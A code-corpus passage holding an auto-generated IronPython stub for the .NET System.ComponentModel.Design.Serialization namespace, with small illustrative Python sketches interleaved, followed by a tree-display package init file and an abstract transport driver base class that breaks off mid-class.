"MIT"
] | null | null | null | release/stubs/System/ComponentModel/Design/Serialization.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | # encoding: utf-8
# module System.ComponentModel.Design.Serialization calls itself Serialization
# from System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class ComponentSerializationService(object):
""" Provides the base class for serializing a set of components or serializable objects into a serialization store. """
def CreateStore(self):
"""
CreateStore(self: ComponentSerializationService) -> SerializationStore
Creates a new System.ComponentModel.Design.Serialization.SerializationStore.
Returns: A new System.ComponentModel.Design.Serialization.SerializationStore.
"""
pass
def Deserialize(self, store, container=None):
"""
Deserialize(self: ComponentSerializationService, store: SerializationStore, container: IContainer) -> ICollection
Deserializes the given store and populates the given System.ComponentModel.IContainer with
deserialized System.ComponentModel.IComponent objects.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
container: The System.ComponentModel.IContainer to which System.ComponentModel.IComponent objects will be
added.
Returns: A collection of objects created according to the stored state.
Deserialize(self: ComponentSerializationService, store: SerializationStore) -> ICollection
Deserializes the given store to produce a collection of objects.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
Returns: A collection of objects created according to the stored state.
"""
pass
def DeserializeTo(
self, store, container, validateRecycledTypes=None, applyDefaults=None
):
"""
DeserializeTo(self: ComponentSerializationService, store: SerializationStore, container: IContainer, validateRecycledTypes: bool)
Deserializes the given System.ComponentModel.Design.Serialization.SerializationStore to the
given container, optionally validating recycled types.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
container: The container to which System.ComponentModel.IComponent objects will be added.
validateRecycledTypes: true to guarantee that the deserialization will only work if applied to an object of the same
type.
DeserializeTo(self: ComponentSerializationService, store: SerializationStore, container: IContainer)
Deserializes the given System.ComponentModel.Design.Serialization.SerializationStore to the
given container.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
container: The container to which System.ComponentModel.IComponent objects will be added.
DeserializeTo(self: ComponentSerializationService, store: SerializationStore, container: IContainer, validateRecycledTypes: bool, applyDefaults: bool)
Deserializes the given System.ComponentModel.Design.Serialization.SerializationStore to the
given container, optionally applying default property values.
store: The System.ComponentModel.Design.Serialization.SerializationStore to deserialize.
container: The container to which System.ComponentModel.IComponent objects will be added.
validateRecycledTypes: true to guarantee that the deserialization will only work if applied to an object of the same
type.
applyDefaults: true to indicate that the default property values should be applied.
"""
pass
def LoadStore(self, stream):
"""
LoadStore(self: ComponentSerializationService, stream: Stream) -> SerializationStore
Loads a System.ComponentModel.Design.Serialization.SerializationStore from a stream.
stream: The System.IO.Stream from which the store will be loaded.
Returns: A new System.ComponentModel.Design.Serialization.SerializationStore instance.
"""
pass
def Serialize(self, store, value):
"""
Serialize(self: ComponentSerializationService, store: SerializationStore, value: object)
Serializes the given object to the given
System.ComponentModel.Design.Serialization.SerializationStore.
store: The System.ComponentModel.Design.Serialization.SerializationStore to which the state of value
will be written.
value: The object to serialize.
"""
pass
def SerializeAbsolute(self, store, value):
"""
SerializeAbsolute(self: ComponentSerializationService, store: SerializationStore, value: object)
Serializes the given object, accounting for default property values.
store: The System.ComponentModel.Design.Serialization.SerializationStore to which the state of value
will be serialized.
value: The object to serialize.
"""
pass
def SerializeMember(self, store, owningObject, member):
"""
SerializeMember(self: ComponentSerializationService, store: SerializationStore, owningObject: object, member: MemberDescriptor)
Serializes the given member on the given object.
store: The System.ComponentModel.Design.Serialization.SerializationStore to which the state of member
will be serialized.
owningObject: The object to which member is attached.
member: A System.ComponentModel.MemberDescriptor specifying the member to serialize.
"""
pass
def SerializeMemberAbsolute(self, store, owningObject, member):
"""
SerializeMemberAbsolute(self: ComponentSerializationService, store: SerializationStore, owningObject: object, member: MemberDescriptor)
Serializes the given member on the given object, accounting for the default property value.
store: The System.ComponentModel.Design.Serialization.SerializationStore to which the state of member
will be serialized.
owningObject: The object to which member is attached.
member: The member to serialize.
"""
pass
class ContextStack(object):
"""
Provides a stack object that can be used by a serializer to make information available to nested serializers.
ContextStack()
"""
def Append(self, context):
"""
Append(self: ContextStack, context: object)
Appends an object to the end of the stack, rather than pushing it onto the top of the stack.
context: A context object to append to the stack.
"""
pass
def Pop(self):
"""
Pop(self: ContextStack) -> object
Removes the current object off of the stack, returning its value.
Returns: The object removed from the stack; null if no objects are on the stack.
"""
pass
def Push(self, context):
"""
Push(self: ContextStack, context: object)
Pushes, or places, the specified object onto the stack.
context: The context object to push onto the stack.
"""
pass
def __getitem__(self, *args): # cannot find CLR method
""" x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y] """
pass
Current = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the current object on the stack.
Get: Current(self: ContextStack) -> object
"""
class DefaultSerializationProviderAttribute(Attribute, _Attribute):
"""
The System.ComponentModel.Design.Serialization.DefaultSerializationProviderAttribute attribute is placed on a serializer to indicate the class to use as a default provider of that type of serializer.
DefaultSerializationProviderAttribute(providerType: Type)
DefaultSerializationProviderAttribute(providerTypeName: str)
"""
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type, providerType: Type)
__new__(cls: type, providerTypeName: str)
"""
pass
ProviderTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the type name of the serialization provider.
Get: ProviderTypeName(self: DefaultSerializationProviderAttribute) -> str
"""
class DesignerLoader(object):
""" Provides a basic designer loader interface that can be used to implement a custom designer loader. """
def BeginLoad(self, host):
"""
BeginLoad(self: DesignerLoader, host: IDesignerLoaderHost)
Begins loading a designer.
host: The loader host through which this loader loads components.
"""
pass
def Dispose(self):
"""
Dispose(self: DesignerLoader)
Releases all resources used by the System.ComponentModel.Design.Serialization.DesignerLoader.
"""
pass
def Flush(self):
"""
Flush(self: DesignerLoader)
Writes cached changes to the location that the designer was loaded from.
"""
pass
Loading = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the loader is currently loading a document.
Get: Loading(self: DesignerLoader) -> bool
"""
class DesignerSerializerAttribute(Attribute, _Attribute):
"""
Indicates a serializer for the serialization manager to use to serialize the values of the type this attribute is applied to. This class cannot be inherited.
DesignerSerializerAttribute(serializerType: Type, baseSerializerType: Type)
DesignerSerializerAttribute(serializerTypeName: str, baseSerializerType: Type)
DesignerSerializerAttribute(serializerTypeName: str, baseSerializerTypeName: str)
"""
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type, serializerType: Type, baseSerializerType: Type)
__new__(cls: type, serializerTypeName: str, baseSerializerType: Type)
__new__(cls: type, serializerTypeName: str, baseSerializerTypeName: str)
"""
pass
SerializerBaseTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the fully qualified type name of the serializer base type.
Get: SerializerBaseTypeName(self: DesignerSerializerAttribute) -> str
"""
SerializerTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the fully qualified type name of the serializer.
Get: SerializerTypeName(self: DesignerSerializerAttribute) -> str
"""
TypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Indicates a unique ID for this attribute type.
Get: TypeId(self: DesignerSerializerAttribute) -> object
"""
class IDesignerLoaderHost(IDesignerHost, IServiceContainer, IServiceProvider):
""" Provides an interface that can extend a designer host to support loading from a serialized state. """
def EndLoad(self, baseClassName, successful, errorCollection):
"""
EndLoad(self: IDesignerLoaderHost, baseClassName: str, successful: bool, errorCollection: ICollection)
Ends the designer loading operation.
baseClassName: The fully qualified name of the base class of the document that this designer is designing.
successful: true if the designer is successfully loaded; otherwise, false.
errorCollection: A collection containing the errors encountered during load, if any. If no errors were
encountered, pass either an empty collection or null.
"""
pass
def Reload(self):
"""
Reload(self: IDesignerLoaderHost)
Reloads the design document.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class IDesignerLoaderHost2(
IDesignerLoaderHost, IDesignerHost, IServiceContainer, IServiceProvider
):
""" Provides an interface that extends System.ComponentModel.Design.Serialization.IDesignerLoaderHost to specify whether errors are tolerated while loading a design document. """
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
CanReloadWithErrors = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets or sets a value indicating whether it is possible to reload with errors.
Get: CanReloadWithErrors(self: IDesignerLoaderHost2) -> bool
Set: CanReloadWithErrors(self: IDesignerLoaderHost2) = value
"""
IgnoreErrorsDuringReload = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets or sets a value indicating whether errors should be ignored when System.ComponentModel.Design.Serialization.IDesignerLoaderHost.Reload is called.
Get: IgnoreErrorsDuringReload(self: IDesignerLoaderHost2) -> bool
Set: IgnoreErrorsDuringReload(self: IDesignerLoaderHost2) = value
"""
class IDesignerLoaderService:
""" Provides an interface that can extend a designer loader to support asynchronous loading of external components. """
def AddLoadDependency(self):
"""
AddLoadDependency(self: IDesignerLoaderService)
Registers an external component as part of the load process managed by this interface.
"""
pass
def DependentLoadComplete(self, successful, errorCollection):
"""
DependentLoadComplete(self: IDesignerLoaderService, successful: bool, errorCollection: ICollection)
Signals that a dependent load has finished.
successful: true if the load of the designer is successful; false if errors prevented the load from
finishing.
errorCollection: A collection of errors that occurred during the load, if any. If no errors occurred, pass either
an empty collection or null.
"""
pass
def Reload(self):
"""
Reload(self: IDesignerLoaderService) -> bool
Reloads the design document.
Returns: true if the reload request is accepted, or false if the loader does not allow the reload.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class IDesignerSerializationManager(IServiceProvider):
""" Provides an interface that can manage design-time serialization. """
def AddSerializationProvider(self, provider):
"""
AddSerializationProvider(self: IDesignerSerializationManager, provider: IDesignerSerializationProvider)
Adds the specified serialization provider to the serialization manager.
provider: The serialization provider to add.
"""
pass
def CreateInstance(self, type, arguments, name, addToContainer):
"""
CreateInstance(self: IDesignerSerializationManager, type: Type, arguments: ICollection, name: str, addToContainer: bool) -> object
Creates an instance of the specified type and adds it to a collection of named instances.
type: The data type to create.
arguments: The arguments to pass to the constructor for this type.
name: The name of the object. This name can be used to access the object later through
System.ComponentModel.Design.Serialization.IDesignerSerializationManager.GetInstance(System.String). If null is passed, the object is still created but cannot be accessed by name.
addToContainer: If true, this object is added to the design container. The object must implement
System.ComponentModel.IComponent for this to have any effect.
Returns: The newly created object instance.
"""
pass
def GetInstance(self, name):
"""
GetInstance(self: IDesignerSerializationManager, name: str) -> object
Gets an instance of a created object of the specified name, or null if that object does not
exist.
name: The name of the object to retrieve.
Returns: An instance of the object with the given name, or null if no object by that name can be found.
"""
pass
def GetName(self, value):
"""
GetName(self: IDesignerSerializationManager, value: object) -> str
Gets the name of the specified object, or null if the object has no name.
value: The object to retrieve the name for.
Returns: The name of the object, or null if the object is unnamed.
"""
pass
def GetSerializer(self, objectType, serializerType):
"""
GetSerializer(self: IDesignerSerializationManager, objectType: Type, serializerType: Type) -> object
Gets a serializer of the requested type for the specified object type.
objectType: The type of the object to get the serializer for.
serializerType: The type of the serializer to retrieve.
Returns: An instance of the requested serializer, or null if no appropriate serializer can be located.
"""
pass
def GetType(self, typeName):
"""
GetType(self: IDesignerSerializationManager, typeName: str) -> Type
Gets a type of the specified name.
typeName: The fully qualified name of the type to load.
Returns: An instance of the type, or null if the type cannot be loaded.
"""
pass
def RemoveSerializationProvider(self, provider):
"""
RemoveSerializationProvider(self: IDesignerSerializationManager, provider: IDesignerSerializationProvider)
Removes a custom serialization provider from the serialization manager.
provider: The provider to remove. This object must have been added using
System.ComponentModel.Design.Serialization.IDesignerSerializationManager.AddSerializationProvider(System.ComponentModel.Design.Serialization.IDesignerSerializationProvider).
"""
pass
def ReportError(self, errorInformation):
"""
ReportError(self: IDesignerSerializationManager, errorInformation: object)
Reports an error in serialization.
errorInformation: The error to report. This information object can be of any object type. If it is an exception,
the message of the exception is extracted and reported to the user. If it is any other type,
System.Object.ToString is called to display the information to the user.
"""
pass
def SetName(self, instance, name):
"""
SetName(self: IDesignerSerializationManager, instance: object, name: str)
Sets the name of the specified existing object.
instance: The object instance to name.
name: The name to give the instance.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
Context = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a stack-based, user-defined storage area that is useful for communication between serializers.
Get: Context(self: IDesignerSerializationManager) -> ContextStack
"""
Properties = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Indicates custom properties that can be serializable with available serializers.
Get: Properties(self: IDesignerSerializationManager) -> PropertyDescriptorCollection
"""
ResolveName = None
SerializationComplete = None
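The naming contract the stubs above describe (create an instance, look it up by name, name an existing object) can be sketched in plain Python. `ToySerializationManager` below is an illustrative stand-in for that contract only, not part of the CLR API:

```python
class ToySerializationManager:
    """Illustrative stand-in for the IDesignerSerializationManager naming contract."""

    def __init__(self):
        self._by_name = {}   # name -> instance
        self._names = {}     # id(instance) -> name (fragile in general; fine for a sketch)

    def create_instance(self, factory, arguments, name=None):
        # Mirrors CreateInstance: build the object, optionally register it by name.
        instance = factory(*arguments)
        if name is not None:
            self.set_name(instance, name)
        return instance

    def get_instance(self, name):
        # Mirrors GetInstance: None plays the role of CLR null.
        return self._by_name.get(name)

    def get_name(self, value):
        # Mirrors GetName: None for an unnamed object.
        return self._names.get(id(value))

    def set_name(self, instance, name):
        # Mirrors SetName.
        self._by_name[name] = instance
        self._names[id(instance)] = name

mgr = ToySerializationManager()
obj = mgr.create_instance(list, ([1, 2],), name="items")
print(mgr.get_instance("items") is obj)   # True
print(mgr.get_name(obj))                  # items
print(mgr.get_instance("missing"))        # None
```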
class IDesignerSerializationProvider:
""" Provides an interface that enables access to a serializer. """
def GetSerializer(self, manager, currentSerializer, objectType, serializerType):
"""
GetSerializer(self: IDesignerSerializationProvider, manager: IDesignerSerializationManager, currentSerializer: object, objectType: Type, serializerType: Type) -> object
Gets a serializer using the specified attributes.
manager: The serialization manager requesting the serializer.
currentSerializer: An instance of the current serializer of the specified type. This can be null if no serializer
of the specified type exists.
objectType: The data type of the object to serialize.
serializerType: The data type of the serializer to create.
Returns: An instance of a serializer of the type requested, or null if the request cannot be satisfied.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class IDesignerSerializationService:
""" Provides an interface that can invoke serialization and deserialization. """
def Deserialize(self, serializationData):
"""
Deserialize(self: IDesignerSerializationService, serializationData: object) -> ICollection
Deserializes the specified serialization data object and returns a collection of objects
represented by that data.
serializationData: An object consisting of serialized data.
Returns: An System.Collections.ICollection of objects rebuilt from the specified serialization data
object.
"""
pass
def Serialize(self, objects):
"""
Serialize(self: IDesignerSerializationService, objects: ICollection) -> object
Serializes the specified collection of objects and stores them in a serialization data object.
objects: A collection of objects to serialize.
Returns: An object that contains the serialized state of the specified collection of objects.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class INameCreationService:
""" Provides a service that can generate unique names for objects. """
def CreateName(self, container, dataType):
"""
CreateName(self: INameCreationService, container: IContainer, dataType: Type) -> str
Creates a new name that is unique to all components in the specified container.
container: The container where the new object is added.
dataType: The data type of the object that receives the name.
Returns: A unique name for the data type.
"""
pass
def IsValidName(self, name):
"""
IsValidName(self: INameCreationService, name: str) -> bool
Gets a value indicating whether the specified name is valid.
name: The name to validate.
Returns: true if the name is valid; otherwise, false.
"""
pass
def ValidateName(self, name):
"""
ValidateName(self: INameCreationService, name: str)
Validates the specified name, raising an exception if the name is not valid.
name: The name to validate.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
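As a rough illustration of what CreateName promises (a name unique among the components already in the container), here is a plain-Python sketch. The lower-casing and numbering scheme is an assumption for the example, not the documented CLR rule:

```python
def create_name(existing_names, type_name):
    """Sketch of INameCreationService.CreateName: type name plus first free index."""
    base = type_name[0].lower() + type_name[1:]
    i = 1
    while f"{base}{i}" in existing_names:
        i += 1
    return f"{base}{i}"

taken = {"button1", "button2"}
print(create_name(taken, "Button"))   # button3
print(create_name(taken, "Label"))    # label1
```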
class InstanceDescriptor(object):
"""
Provides the information necessary to create an instance of an object. This class cannot be inherited.
InstanceDescriptor(member: MemberInfo, arguments: ICollection, isComplete: bool)
InstanceDescriptor(member: MemberInfo, arguments: ICollection)
"""
def Invoke(self):
"""
Invoke(self: InstanceDescriptor) -> object
Invokes this instance descriptor and returns the object the descriptor describes.
Returns: The object this instance descriptor describes.
"""
pass
@staticmethod # known case of __new__
def __new__(self, member, arguments, isComplete=None):
"""
__new__(cls: type, member: MemberInfo, arguments: ICollection)
__new__(cls: type, member: MemberInfo, arguments: ICollection, isComplete: bool)
"""
pass
Arguments = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the collection of arguments that can be used to reconstruct an instance of the object that this instance descriptor represents.
Get: Arguments(self: InstanceDescriptor) -> ICollection
"""
IsComplete = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the contents of this System.ComponentModel.Design.Serialization.InstanceDescriptor completely identify the instance.
Get: IsComplete(self: InstanceDescriptor) -> bool
"""
MemberInfo = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the member information that describes the instance this descriptor is associated with.
Get: MemberInfo(self: InstanceDescriptor) -> MemberInfo
"""
class MemberRelationship(object):
"""
Represents a single relationship between an object and a member.
MemberRelationship(owner: object, member: MemberDescriptor)
"""
def Equals(self, obj):
"""
Equals(self: MemberRelationship, obj: object) -> bool
Determines whether two System.ComponentModel.Design.Serialization.MemberRelationship instances
are equal.
obj: The System.ComponentModel.Design.Serialization.MemberRelationship to compare with the current
System.ComponentModel.Design.Serialization.MemberRelationship.
Returns: true if the specified System.ComponentModel.Design.Serialization.MemberRelationship is equal to
the current System.ComponentModel.Design.Serialization.MemberRelationship; otherwise, false.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: MemberRelationship) -> int
Returns the hash code for this instance.
Returns: A hash code for the current System.ComponentModel.Design.Serialization.MemberRelationship.
"""
pass
def __eq__(self, *args): # cannot find CLR method
""" x.__eq__(y) <==> x==y """
pass
@staticmethod # known case of __new__
def __new__(self, owner, member):
"""
__new__[MemberRelationship]() -> MemberRelationship
__new__(cls: type, owner: object, member: MemberDescriptor)
"""
pass
def __ne__(self, *args): # cannot find CLR method
pass
IsEmpty = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether this relationship is equal to the System.ComponentModel.Design.Serialization.MemberRelationship.Empty relationship.
Get: IsEmpty(self: MemberRelationship) -> bool
"""
Member = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the related member.
Get: Member(self: MemberRelationship) -> MemberDescriptor
"""
Owner = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the owning object.
Get: Owner(self: MemberRelationship) -> object
"""
Empty = None
class MemberRelationshipService(object):
""" Provides the base class for relating one member to another. """
def GetRelationship(self, *args): # cannot find CLR method
"""
GetRelationship(self: MemberRelationshipService, source: MemberRelationship) -> MemberRelationship
Gets a relationship to the given source relationship.
source: The source relationship.
Returns: A relationship to source, or System.ComponentModel.Design.Serialization.MemberRelationship.Empty
if no relationship exists.
"""
pass
def SetRelationship(self, *args): # cannot find CLR method
"""
SetRelationship(self: MemberRelationshipService, source: MemberRelationship, relationship: MemberRelationship)
Creates a relationship between the source object and target relationship.
source: The source relationship.
relationship: The relationship to set into the source.
"""
pass
def SupportsRelationship(self, source, relationship):
"""
SupportsRelationship(self: MemberRelationshipService, source: MemberRelationship, relationship: MemberRelationship) -> bool
Gets a value indicating whether the given relationship is supported.
source: The source relationship.
relationship: The relationship to set into the source.
Returns: true if a relationship between the given two objects is supported; otherwise, false.
"""
pass
def __getitem__(self, *args): # cannot find CLR method
""" x.__getitem__(y) <==> x[y]x.__getitem__(y) <==> x[y] """
pass
def __setitem__(self, *args): # cannot find CLR method
""" x.__setitem__(i, y) <==> x[i]=x.__setitem__(i, y) <==> x[i]= """
pass
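The indexer pair above gives the service dict-like access: `service[source]` reads a relationship and assignment records one. A plain-Python sketch of that shape, with tuples standing in for `MemberRelationship`:

```python
class ToyRelationshipService:
    """Sketch of MemberRelationshipService's mapping behavior."""
    EMPTY = ("<empty>", None)   # stands in for MemberRelationship.Empty

    def __init__(self):
        self._table = {}

    def __getitem__(self, source):
        # Mirrors GetRelationship: Empty when nothing was recorded for source.
        return self._table.get(source, self.EMPTY)

    def __setitem__(self, source, relationship):
        # Mirrors SetRelationship.
        self._table[source] = relationship

svc = ToyRelationshipService()
svc[("form", "Text")] = ("button", "Text")
print(svc[("form", "Text")])    # ('button', 'Text')
print(svc[("form", "Size")])    # ('<empty>', None)
```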
class ResolveNameEventArgs(EventArgs):
"""
Provides data for the System.ComponentModel.Design.Serialization.IDesignerSerializationManager.ResolveName event.
ResolveNameEventArgs(name: str)
"""
@staticmethod # known case of __new__
def __new__(self, name):
""" __new__(cls: type, name: str) """
pass
Name = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the name of the object to resolve.
Get: Name(self: ResolveNameEventArgs) -> str
"""
Value = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets or sets the object that matches the name.
Get: Value(self: ResolveNameEventArgs) -> object
Set: Value(self: ResolveNameEventArgs) = value
"""
class ResolveNameEventHandler(MulticastDelegate, ICloneable, ISerializable):
"""
Represents the method that handles the System.ComponentModel.Design.Serialization.IDesignerSerializationManager.ResolveName event of a serialization manager.
ResolveNameEventHandler(object: object, method: IntPtr)
"""
def BeginInvoke(self, sender, e, callback, object):
""" BeginInvoke(self: ResolveNameEventHandler, sender: object, e: ResolveNameEventArgs, callback: AsyncCallback, object: object) -> IAsyncResult """
pass
def CombineImpl(self, *args): # cannot find CLR method
"""
CombineImpl(self: MulticastDelegate, follow: Delegate) -> Delegate
Combines this System.Delegate with the specified System.Delegate to form a new delegate.
follow: The delegate to combine with this delegate.
Returns: A delegate that is the new root of the System.MulticastDelegate invocation list.
"""
pass
def DynamicInvokeImpl(self, *args): # cannot find CLR method
"""
DynamicInvokeImpl(self: Delegate, args: Array[object]) -> object
Dynamically invokes (late-bound) the method represented by the current delegate.
args: An array of objects that are the arguments to pass to the method represented by the current
delegate.-or- null, if the method represented by the current delegate does not require
arguments.
Returns: The object returned by the method represented by the delegate.
"""
pass
def EndInvoke(self, result):
""" EndInvoke(self: ResolveNameEventHandler, result: IAsyncResult) """
pass
def GetMethodImpl(self, *args): # cannot find CLR method
"""
GetMethodImpl(self: MulticastDelegate) -> MethodInfo
Returns a static method represented by the current System.MulticastDelegate.
Returns: A static method represented by the current System.MulticastDelegate.
"""
pass
def Invoke(self, sender, e):
""" Invoke(self: ResolveNameEventHandler, sender: object, e: ResolveNameEventArgs) """
pass
def RemoveImpl(self, *args): # cannot find CLR method
"""
RemoveImpl(self: MulticastDelegate, value: Delegate) -> Delegate
Removes an element from the invocation list of this System.MulticastDelegate that is equal to
the specified delegate.
value: The delegate to search for in the invocation list.
Returns: If value is found in the invocation list for this instance, then a new System.Delegate without
value in its invocation list; otherwise, this instance with its original invocation list.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, object, method):
""" __new__(cls: type, object: object, method: IntPtr) """
pass
def __reduce_ex__(self, *args): # cannot find CLR method
pass
class RootDesignerSerializerAttribute(Attribute, _Attribute):
"""
Indicates the base serializer to use for a root designer object. This class cannot be inherited.
RootDesignerSerializerAttribute(serializerTypeName: str, baseSerializerTypeName: str, reloadable: bool)
RootDesignerSerializerAttribute(serializerType: Type, baseSerializerType: Type, reloadable: bool)
RootDesignerSerializerAttribute(serializerTypeName: str, baseSerializerType: Type, reloadable: bool)
"""
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type, serializerType: Type, baseSerializerType: Type, reloadable: bool)
__new__(cls: type, serializerTypeName: str, baseSerializerType: Type, reloadable: bool)
__new__(cls: type, serializerTypeName: str, baseSerializerTypeName: str, reloadable: bool)
"""
pass
Reloadable = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the root serializer supports reloading of the design document without first disposing the designer host.
Get: Reloadable(self: RootDesignerSerializerAttribute) -> bool
"""
SerializerBaseTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the fully qualified type name of the base type of the serializer.
Get: SerializerBaseTypeName(self: RootDesignerSerializerAttribute) -> str
"""
SerializerTypeName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets the fully qualified type name of the serializer.
Get: SerializerTypeName(self: RootDesignerSerializerAttribute) -> str
"""
TypeId = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a unique ID for this attribute type.
Get: TypeId(self: RootDesignerSerializerAttribute) -> object
"""
class SerializationStore(object, IDisposable):
""" Provides the base class for storing serialization data for the System.ComponentModel.Design.Serialization.ComponentSerializationService. """
def Close(self):
"""
Close(self: SerializationStore)
Closes the serialization store.
"""
pass
def Dispose(self, *args): # cannot find CLR method
"""
Dispose(self: SerializationStore, disposing: bool)
Releases the unmanaged resources used by the
System.ComponentModel.Design.Serialization.SerializationStore and optionally releases the
managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def Save(self, stream):
"""
Save(self: SerializationStore, stream: Stream)
Saves the store to the given stream.
stream: The stream to which the store will be serialized.
"""
pass
def __enter__(self, *args): # cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): # cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self, *args): # cannot find CLR method
""" __repr__(self: object) -> str """
pass
Errors = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a collection of errors that occurred during serialization or deserialization.
Get: Errors(self: SerializationStore) -> ICollection
"""
# === File: sutree/display/__init__.py | repo: thanhit95/sutree | license: BSD-3-Clause ===
'''
TREE DISPLAY LIBRARY
Description: A utility that helps visualize trees using ASCII text.
'''
from .nonbintreedisplay import NonBinTreeDisplay
from .bintreedisplay import BinTreeDisplay
__all__ = [
'NonBinTreeDisplay',
'BinTreeDisplay'
]
# === File: poppy/transport/base.py | repo: jqxin2006/poppy | license: Apache-2.0 ===
# Copyright (c) 2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class TransportDriverBase(object):
"""Base class for Transport Drivers to document the expected interface.
:param conf: configuration instance
:type conf: oslo.config.cfg.CONF
"""
def __init__(self, conf, manager):
self._conf = conf
self._manager = manager
self._app = None
@property
def app(self):
"""Get app.
:returns app
"""
return self._app
@property
def conf(self):
"""Get conf.
:returns conf
"""
return self._conf
@property
def manager(self):
"""Get manager
:returns manager
"""
return self._manager
@abc.abstractmethod
def listen(self):
"""Start listening for client requests (self-hosting mode).
:raises NotImplementedError
"""
raise NotImplementedError
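A minimal runnable sketch of how a concrete driver would fill in this interface, using `abc.ABC` in place of the `six.add_metaclass` decorator used above; `EchoDriver` and its config keys are made up for illustration:

```python
import abc

class ToyTransportDriver(abc.ABC):
    """Minimal stand-in for TransportDriverBase."""

    def __init__(self, conf, manager):
        self._conf = conf
        self._manager = manager

    @abc.abstractmethod
    def listen(self):
        """Start listening for client requests."""

class EchoDriver(ToyTransportDriver):
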